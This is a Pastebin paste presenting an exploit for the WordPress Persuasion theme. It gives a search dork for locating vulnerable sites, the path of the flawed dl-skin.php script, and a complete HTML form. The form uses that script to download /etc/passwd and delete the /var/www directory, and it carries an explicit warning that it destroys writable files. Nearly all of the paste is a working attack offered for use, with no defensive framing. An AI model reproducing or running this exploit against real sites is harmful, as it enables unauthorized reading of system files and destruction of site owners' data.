API tools faq
paste
Advertisement
k3rama7

Exploit Wordpress : Persuasion Theme - Arbitary File Downloa

k3rama7
May 31st, 2014
514
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
raw download clone embed print report
  1. Dork: inurl:/wp-content/themes/persuasion/
  2.  
  3. Vuln Path: /wp-content/themes/persuasion/lib/scripts/dl-skin.php
  4.  
  5.  
  6. Exploit script.html
  7.  
  8. <html>
  9. <body>
  10. <form action="http://site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php" method="post">
  11. Existing file's name:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
  12. Directory to be removed:<input type="text" name="_mysite_delete_skin_zip" value="/var/www"><font color=red>Use with caution it will delete the files and directories if it is writeable</font><br>
  13. <input type="submit">
  14. </form>
  15. </body>
  16. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!